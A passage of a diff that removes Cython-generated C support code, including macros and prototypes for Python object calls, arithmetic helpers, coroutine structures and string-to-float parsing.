cache_var, version_var) -#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); -#endif - -/* GetModuleGlobalName.proto */ -#if CYTHON_USE_DICT_VERSIONS -#define __Pyx_GetModuleGlobalName(var, name) do {\ - static PY_UINT64_T __pyx_dict_version = 0;\ - static PyObject *__pyx_dict_cached_value = NULL;\ - (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ - (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ - __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ -} while(0) -#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ - PY_UINT64_T __pyx_dict_version;\ - PyObject *__pyx_dict_cached_value;\ - (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ -} while(0) -static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); -#else -#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) -#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) -static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); -#endif - -/* PyObjectCall.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); -#else -#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) -#endif - -/* PyFunctionFastCall.proto */ -#if CYTHON_FAST_PYCALL -#if !CYTHON_VECTORCALL -#define __Pyx_PyFunction_FastCall(func, args, nargs)\ - __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) -static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); -#endif -#define __Pyx_BUILD_ASSERT_EXPR(cond)\ - (sizeof(char [1 - 2*!(cond)]) - 1) -#ifndef Py_MEMBER_SIZE -#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) -#endif -#if !CYTHON_VECTORCALL -#if PY_VERSION_HEX >= 0x03080000 - #include "frameobject.h" -#if PY_VERSION_HEX >= 0x030b00a6 && !CYTHON_COMPILING_IN_LIMITED_API - #ifndef Py_BUILD_CORE - #define Py_BUILD_CORE 1 - #endif - #include "internal/pycore_frame.h" -#endif - #define __Pxy_PyFrame_Initialize_Offsets() - #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) -#else - static size_t __pyx_pyframe_localsplus_offset = 0; - #include "frameobject.h" - #define __Pxy_PyFrame_Initialize_Offsets()\ - ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ - (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) - #define __Pyx_PyFrame_GetLocalsplus(frame)\ - (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) -#endif -#endif -#endif - -/* PyObjectCallMethO.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); -#endif - -/* PyObjectFastCall.proto */ -#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) -static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_MultiplyCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_MultiplyCObj(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceMultiply(op1, op2) : PyNumber_Multiply(op1, op2)) -#endif - -/* RaiseTooManyValuesToUnpack.proto */ -static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); - -/* RaiseNeedMoreValuesToUnpack.proto */ -static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); - -/* IterFinish.proto */ -static CYTHON_INLINE int __Pyx_IterFinish(void); - -/* UnpackItemEndCheck.proto */ -static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected); - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_TrueDivideObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_TrueDivideObjC(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceTrueDivide(op1, op2) : PyNumber_TrueDivide(op1, op2)) -#endif - -/* PyIntCompare.proto */ -static CYTHON_INLINE int __Pyx_PyInt_BoolNeObjC(PyObject *op1, PyObject *op2, long intval, long inplace); - -/* ListAppend.proto */ -#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS -static CYTHON_INLINE int __Pyx_PyList_Append(PyObject* list, PyObject* x) { - PyListObject* L = (PyListObject*) list; - Py_ssize_t len = Py_SIZE(list); - if (likely(L->allocated > len) & likely(len > (L->allocated >> 1))) { - Py_INCREF(x); - PyList_SET_ITEM(list, len, x); - __Pyx_SET_SIZE(list, len + 1); - return 0; - } - return PyList_Append(list, x); -} -#else -#define __Pyx_PyList_Append(L,x) PyList_Append(L,x) -#endif - -/* ListCompAppend.proto */ -#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS -static CYTHON_INLINE int __Pyx_ListComp_Append(PyObject* list, PyObject* x) { - PyListObject* L = (PyListObject*) list; - Py_ssize_t len = Py_SIZE(list); - if (likely(L->allocated > len)) { - Py_INCREF(x); - PyList_SET_ITEM(list, len, x); - __Pyx_SET_SIZE(list, len + 1); - return 0; - } - return PyList_Append(list, x); -} -#else -#define __Pyx_ListComp_Append(L,x) PyList_Append(L,x) -#endif - -/* GetItemInt.proto */ -#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ - (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ - __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ - (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ - __Pyx_GetItemInt_Generic(o, to_py_func(i)))) -#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ - (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ - __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ - (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, - int wraparound, int boundscheck); -#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ - (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ - __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ - (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, - int wraparound, int boundscheck); -static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, - int is_list, int wraparound, int boundscheck); - -/* PyObjectCallOneArg.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); - -/* ObjectGetItem.proto */ -#if CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); -#else -#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) -#endif - -/* PyIntCompare.proto */ -static CYTHON_INLINE int __Pyx_PyInt_BoolEqObjC(PyObject *op1, PyObject *op2, long intval, long inplace); - -/* RaiseUnboundLocalError.proto */ -static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname); - -/* GetException.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) -static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#else -static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); -#endif - -/* pep479.proto */ -static void __Pyx_Generator_Replace_StopIteration(int in_async_gen); - -/* IncludeStructmemberH.proto */ -#include - -/* FixUpExtensionType.proto */ -#if CYTHON_USE_TYPE_SPECS -static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); -#endif - -/* FetchSharedCythonModule.proto */ -static PyObject *__Pyx_FetchSharedCythonABIModule(void); - -/* FetchCommonType.proto */ -#if !CYTHON_USE_TYPE_SPECS -static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); -#else -static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); -#endif - -/* RaiseException.proto */ -static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); - -/* GetTopmostException.proto */ -#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE -static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); -#endif - -/* SaveResetException.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); -#else -#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) -#define __Pyx_ExceptionReset(type, value, tb) PyErr_SetExcInfo(type, value, tb) -#endif - -/* SwapException.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_ExceptionSwap(type, value, tb) __Pyx__ExceptionSwap(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#else -static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb); -#endif - -/* PyObjectCall2Args.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2); - -/* PyObjectGetMethod.proto */ -static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); - -/* PyObjectCallMethod1.proto */ -static PyObject* __Pyx_PyObject_CallMethod1(PyObject* obj, PyObject* method_name, PyObject* arg); - -/* PyObjectCallNoArg.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); - -/* CoroutineBase.proto */ -struct __pyx_CoroutineObject; -typedef PyObject *(*__pyx_coroutine_body_t)(struct __pyx_CoroutineObject *, PyThreadState *, PyObject *); -#if CYTHON_USE_EXC_INFO_STACK -#define __Pyx_ExcInfoStruct _PyErr_StackItem -#else -typedef struct { - PyObject *exc_type; - PyObject *exc_value; - PyObject *exc_traceback; -} __Pyx_ExcInfoStruct; -#endif -typedef struct __pyx_CoroutineObject { - PyObject_HEAD - __pyx_coroutine_body_t body; - PyObject *closure; - __Pyx_ExcInfoStruct gi_exc_state; - PyObject *gi_weakreflist; - PyObject *classobj; - PyObject *yieldfrom; - PyObject *gi_name; - PyObject *gi_qualname; - PyObject *gi_modulename; - PyObject *gi_code; - PyObject *gi_frame; - int resume_label; - char is_running; -} __pyx_CoroutineObject; -static __pyx_CoroutineObject *__Pyx__Coroutine_New( - PyTypeObject *type, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name); -static __pyx_CoroutineObject *__Pyx__Coroutine_NewInit( - __pyx_CoroutineObject *gen, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, - PyObject *name, PyObject *qualname, PyObject *module_name); -static CYTHON_INLINE void __Pyx_Coroutine_ExceptionClear(__Pyx_ExcInfoStruct *self); -static int __Pyx_Coroutine_clear(PyObject *self); -static PyObject *__Pyx_Coroutine_Send(PyObject *self, PyObject *value); -static PyObject *__Pyx_Coroutine_Close(PyObject *self); -static PyObject *__Pyx_Coroutine_Throw(PyObject *gen, PyObject *args); -#if CYTHON_USE_EXC_INFO_STACK -#define __Pyx_Coroutine_SwapException(self) -#define __Pyx_Coroutine_ResetAndClearException(self) __Pyx_Coroutine_ExceptionClear(&(self)->gi_exc_state) -#else -#define __Pyx_Coroutine_SwapException(self) {\ - __Pyx_ExceptionSwap(&(self)->gi_exc_state.exc_type, &(self)->gi_exc_state.exc_value, &(self)->gi_exc_state.exc_traceback);\ - __Pyx_Coroutine_ResetFrameBackpointer(&(self)->gi_exc_state);\ - } -#define __Pyx_Coroutine_ResetAndClearException(self) {\ - __Pyx_ExceptionReset((self)->gi_exc_state.exc_type, (self)->gi_exc_state.exc_value, (self)->gi_exc_state.exc_traceback);\ - (self)->gi_exc_state.exc_type = (self)->gi_exc_state.exc_value = (self)->gi_exc_state.exc_traceback = NULL;\ - } -#endif -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyGen_FetchStopIterationValue(pvalue)\ - __Pyx_PyGen__FetchStopIterationValue(__pyx_tstate, pvalue) -#else -#define __Pyx_PyGen_FetchStopIterationValue(pvalue)\ - __Pyx_PyGen__FetchStopIterationValue(__Pyx_PyThreadState_Current, pvalue) -#endif -static int __Pyx_PyGen__FetchStopIterationValue(PyThreadState *tstate, PyObject **pvalue); -static CYTHON_INLINE void __Pyx_Coroutine_ResetFrameBackpointer(__Pyx_ExcInfoStruct *exc_state); - -/* PyObject_GenericGetAttrNoDict.proto */ -#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 -static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); -#else -#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr -#endif - -/* PatchModuleWithCoroutine.proto */ -static PyObject* __Pyx_Coroutine_patch_module(PyObject* module, const char* py_code); - -/* PatchGeneratorABC.proto */ -static int __Pyx_patch_abc(void); - -/* Generator.proto */ -#define __Pyx_Generator_USED -#define __Pyx_Generator_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_GeneratorType) -#define __Pyx_Generator_New(body, code, closure, name, qualname, module_name)\ - __Pyx__Coroutine_New(__pyx_GeneratorType, body, code, closure, name, qualname, module_name) -static PyObject *__Pyx_Generator_Next(PyObject *self); -static int __pyx_Generator_init(PyObject *module); - -/* GeneratorYieldFrom.proto */ -static CYTHON_INLINE PyObject* __Pyx_Generator_Yield_From(__pyx_CoroutineObject *gen, PyObject *source); - -/* append.proto */ -static CYTHON_INLINE int __Pyx_PyObject_Append(PyObject* L, PyObject* x); - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_AddObjC(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceAdd(op1, op2) : PyNumber_Add(op1, op2)) -#endif - -/* py_abs.proto */ -#if CYTHON_USE_PYLONG_INTERNALS -static PyObject *__Pyx_PyLong_AbsNeg(PyObject *num); -#define __Pyx_PyNumber_Absolute(x)\ - ((likely(PyLong_CheckExact(x))) ?\ - (likely(__Pyx_PyLong_IsNonNeg(x)) ? (Py_INCREF(x), (x)) : __Pyx_PyLong_AbsNeg(x)) :\ - PyNumber_Absolute(x)) -#else -#define __Pyx_PyNumber_Absolute(x) PyNumber_Absolute(x) -#endif - -/* PyFloatBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyFloat_TrueDivideObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyFloat_TrueDivideObjC(op1, op2, floatval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceTrueDivide(op1, op2) : PyNumber_TrueDivide(op1, op2)) -#endif - -/* pybytes_as_double.proto */ -static double __Pyx_SlowPyString_AsDouble(PyObject *obj); -static double __Pyx__PyBytes_AsDouble(PyObject *obj, const char* start, Py_ssize_t length); -static CYTHON_INLINE double __Pyx_PyBytes_AsDouble(PyObject *obj) { - return __Pyx__PyBytes_AsDouble(obj, PyBytes_AS_STRING(obj), PyBytes_GET_SIZE(obj)); -} -static CYTHON_INLINE double __Pyx_PyByteArray_AsDouble(PyObject *obj) { - return __Pyx__PyBytes_AsDouble(obj, PyByteArray_AS_STRING(obj), PyByteArray_GET_SIZE(obj)); -} - -/* pyunicode_as_double.proto */ -#if PY_MAJOR_VERSION >= 3 && !CYTHON_COMPILING_IN_PYPY -static const char* __Pyx__PyUnicode_AsDouble_Copy(const void* data, const int kind, char* buffer, Py_ssize_t start, Py_ssize_t end) { - int last_was_punctuation; - Py_ssize_t i; - last_was_punctuation = 1; - for (i=start; i <= end; i++) { - Py_UCS4 chr = PyUnicode_READ(kind, data, i); - int is_punctuation = (chr == '_') | (chr == '.'); - *buffer = (char)chr; - buffer += (chr != '_'); - if (unlikely(chr > 127)) goto parse_failure; - if (unlikely(last_was_punctuation & is_punctuation)) goto parse_failure; - last_was_punctuation = is_punctuation; - } - if (unlikely(last_was_punctuation)) goto parse_failure; - *buffer = '\0'; - return buffer; -parse_failure: - return NULL; -} -static double __Pyx__PyUnicode_AsDouble_inf_nan(const void* data, int kind, Py_ssize_t start, Py_ssize_t length) { - int matches = 1; - Py_UCS4 chr; - Py_UCS4 sign = PyUnicode_READ(kind, data, start); - int is_signed = (sign == '-') | (sign == '+'); - start += is_signed; - length -= is_signed; - switch (PyUnicode_READ(kind, data, start)) { - #ifdef Py_NAN - case 'n': - case 'N': - if (unlikely(length != 3)) goto parse_failure; - chr = PyUnicode_READ(kind, data, start+1); - matches &= (chr == 'a') | (chr == 'A'); - chr = PyUnicode_READ(kind, data, start+2); - matches &= (chr == 'n') | (chr == 'N'); - if (unlikely(!matches)) goto parse_failure; - return (sign == '-') ? -Py_NAN : Py_NAN; - #endif - case 'i': - case 'I': - if (unlikely(length < 3)) goto parse_failure; - chr = PyUnicode_READ(kind, data, start+1); - matches &= (chr == 'n') | (chr == 'N'); - chr = PyUnicode_READ(kind, data, start+2); - matches &= (chr == 'f') | (chr == 'F'); - if (likely(length == 3 && matches)) - return (sign == '-') ? -Py_HUGE_VAL : Py_HUGE_VAL; - if (unlikely(length != 8)) goto parse_failure; - chr = PyUnicode_READ(kind, data, start+3); - matches &= (chr == 'i') | (chr == 'I'); - chr = PyUnicode_READ(kind, data, start+4); - matches &= (chr == 'n') | (chr == 'N'); - chr = PyUnicode_READ(kind, data, start+5); - matches &= (chr == 'i') | (chr == 'I'); - chr = PyUnicode_READ(kind, data, start+6); - matches &= (chr == 't') | (chr == 'T'); - chr = PyUnicode_READ(kind, data, start+7); - matches &= (chr == 'y') | (chr == 'Y'); - if (unlikely(!matches)) goto parse_failure; - return (sign == '-') ? -Py_HUGE_VAL : Py_HUGE_VAL; - case '.': case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': - break; - default: - goto parse_failure; - } - return 0.0; -parse_failure: - return -1.0; -} -static double __Pyx_PyUnicode_AsDouble_WithSpaces(PyObject *obj) { - double value; - const char *last; - char *end; - Py_ssize_t start, length = PyUnicode_GET_LENGTH(obj); - const int kind = PyUnicode_KIND(obj); - const void* data = PyUnicode_DATA(obj); - start = 0; - while (Py_UNICODE_ISSPACE(PyUnicode_READ(kind, data, start))) - start++; - while (start < length - 1 && Py_UNICODE_ISSPACE(PyUnicode_READ(kind, data, length - 1))) - length--; - length -= start; - if (unlikely(length <= 0)) goto fallback; - value = __Pyx__PyUnicode_AsDouble_inf_nan(data, kind, start, length); - if (unlikely(value == -1.0)) goto fallback; - if (value != 0.0) return value; - if (length < 40) { - char number[40]; - last = __Pyx__PyUnicode_AsDouble_Copy(data, kind, number, start, start + length); - if (unlikely(!last)) goto fallback; - value = PyOS_string_to_double(number, &end, NULL); - } else { - char *number = (char*) PyMem_Malloc((length + 1) * sizeof(char)); - if (unlikely(!number)) goto fallback; - last = __Pyx__PyUnicode_AsDouble_Copy(data, kind, number, start, start + length); - if (unlikely(!last)) { - PyMem_Free(number); - goto fallback; - } - value = PyOS_string_to_double(number, &end, NULL); - PyMem_Free(number); - } - if (likely(end == last) || (value == (double)-1 && PyErr_Occurred())) { - return value; - } -fallback: - return __Pyx_SlowPyString_AsDouble(obj); -} -#endif -static CYTHON_INLINE double __Pyx_PyUnicode_AsDouble(PyObject *obj) { -#if PY_MAJOR_VERSION >= 3 && !CYTHON_COMPILING_IN_PYPY - if (unlikely(__Pyx_PyUnicode_READY(obj) == -1)) - return (double)-1; - if (likely(PyUnicode_IS_ASCII(obj))) { - const char *s; - Py_ssize_t length; - s = PyUnicode_AsUTF8AndSize(obj, &length); - return __Pyx__PyBytes_AsDouble(obj, s, length); - } - return __Pyx_PyUnicode_AsDouble_WithSpaces(obj); -#else - return __Pyx_SlowPyString_AsDouble(obj); -#endif -} - -/* pynumber_float.proto */ -static CYTHON_INLINE PyObject* __Pyx__PyNumber_Float(PyObject* obj); -#define __Pyx_PyNumber_Float(x) (PyFloat_CheckExact(x) ? __Pyx_NewRef(x) : __Pyx__PyNumber_Float(x)) - -/* PyFloatBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static int __Pyx_PyFloat_BoolEqObjC(PyObject *op1, PyObject *op2, double floatval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyFloat_BoolEqObjC(op1, op2, floatval, inplace, zerodivision_check)\ - __Pyx_PyObject_IsTrueAndDecref(PyObject_RichCompare(op1, op2, Py_EQ)) - #endif - -/* pow2.proto */ -#define __Pyx_PyNumber_Power2(a, b) PyNumber_Power(a, b, Py_None) - -/* PyIntBinop.proto */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_SubtractCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); -#else -#define __Pyx_PyInt_SubtractCObj(op1, op2, intval, inplace, zerodivision_check)\ - (inplace ? PyNumber_InPlaceSubtract(op1, op2) : PyNumber_Subtract(op1, op2)) -#endif - -/* RaiseClosureNameError.proto */ -static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname); - -/* PyMethodNew.proto */ -#if CYTHON_COMPILING_IN_LIMITED_API -static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { - PyObject *typesModule=NULL, *methodType=NULL, *result=NULL; - CYTHON_UNUSED_VAR(typ); - if (!self) - return __Pyx_NewRef(func); - typesModule = PyImport_ImportModule("types"); - if (!typesModule) return NULL; - methodType = PyObject_GetAttrString(typesModule, "MethodType"); - Py_DECREF(typesModule); - if (!methodType) return NULL; - result = PyObject_CallFunctionObjArgs(methodType, func, self, NULL); - Py_DECREF(methodType); - return result; -} -#elif PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { - CYTHON_UNUSED_VAR(typ); - if (!self) - return __Pyx_NewRef(func); - return PyMethod_New(func, self); -} -#else - #define __Pyx_PyMethod_New PyMethod_New -#endif - -/* PyVectorcallFastCallDict.proto */ -#if CYTHON_METH_FASTCALL -static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); -#endif - -/* CythonFunctionShared.proto */ -#define __Pyx_CyFunction_USED -#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 -#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 -#define __Pyx_CYFUNCTION_CCLASS 0x04 -#define __Pyx_CYFUNCTION_COROUTINE 0x08 -#define __Pyx_CyFunction_GetClosure(f)\ - (((__pyx_CyFunctionObject *) (f))->func_closure) -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - #define __Pyx_CyFunction_GetClassObj(f)\ - (((__pyx_CyFunctionObject *) (f))->func_classobj) -#else - #define __Pyx_CyFunction_GetClassObj(f)\ - ((PyObject*) ((PyCMethodObject *) (f))->mm_class) -#endif -#define __Pyx_CyFunction_SetClassObj(f, classobj)\ - __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) -#define __Pyx_CyFunction_Defaults(type, f)\ - ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) -#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ - ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) -typedef struct { -#if CYTHON_COMPILING_IN_LIMITED_API - PyObject_HEAD - PyObject *func; -#elif PY_VERSION_HEX < 0x030900B1 - PyCFunctionObject func; -#else - PyCMethodObject func; -#endif -#if CYTHON_BACKPORT_VECTORCALL - __pyx_vectorcallfunc func_vectorcall; -#endif -#if PY_VERSION_HEX < 0x030500A0 || CYTHON_COMPILING_IN_LIMITED_API - PyObject *func_weakreflist; -#endif - PyObject *func_dict; - PyObject *func_name; - PyObject *func_qualname; - PyObject *func_doc; - PyObject *func_globals; - PyObject *func_code; - PyObject *func_closure; -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - PyObject *func_classobj; -#endif - void *defaults; - int defaults_pyobjects; - size_t defaults_size; // used by FusedFunction for copying defaults - int flags; - PyObject *defaults_tuple; - PyObject *defaults_kwdict; - PyObject *(*defaults_getter)(PyObject *); - PyObject *func_annotations; - PyObject *func_is_coroutine; -} __pyx_CyFunctionObject; -#undef __Pyx_CyOrPyCFunction_Check -#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) -#define __Pyx_CyOrPyCFunction_Check(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) -#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) -static CYTHON_INLINE int __Pyx__IsSameCyOrCFunction(PyObject *func, void *cfunc); -#undef __Pyx_IsSameCFunction -#define __Pyx_IsSameCFunction(func, cfunc) __Pyx__IsSameCyOrCFunction(func, cfunc) -static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, - int flags, PyObject* qualname, - PyObject *closure, - PyObject *module, PyObject *globals, - PyObject* code); -static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); -static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, - size_t size, - int pyobjects); -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, - PyObject *tuple); -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, - PyObject *dict); -static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, - PyObject *dict); -static int __pyx_CyFunction_init(PyObject *module); -#if CYTHON_METH_FASTCALL -static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); -#if CYTHON_BACKPORT_VECTORCALL -#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) -#else -#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) -#endif -#endif - -/* CythonFunction.proto */ -static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, - int flags, PyObject* qualname, - PyObject *closure, - PyObject *module, PyObject *globals, - PyObject* code); - -/* ListExtend.proto */ -static CYTHON_INLINE int __Pyx_PyList_Extend(PyObject* L, PyObject* v) { -#if CYTHON_COMPILING_IN_CPYTHON - PyObject* none = _PyList_Extend((PyListObject*)L, v); - if (unlikely(!none)) - return -1; - Py_DECREF(none); - return 0; -#else - return PyList_SetSlice(L, PY_SSIZE_T_MAX, PY_SSIZE_T_MAX, v); -#endif -} - -/* pyfrozenset_new.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyFrozenSet_New(PyObject* it); - -/* PySetContains.proto */ -static CYTHON_INLINE int 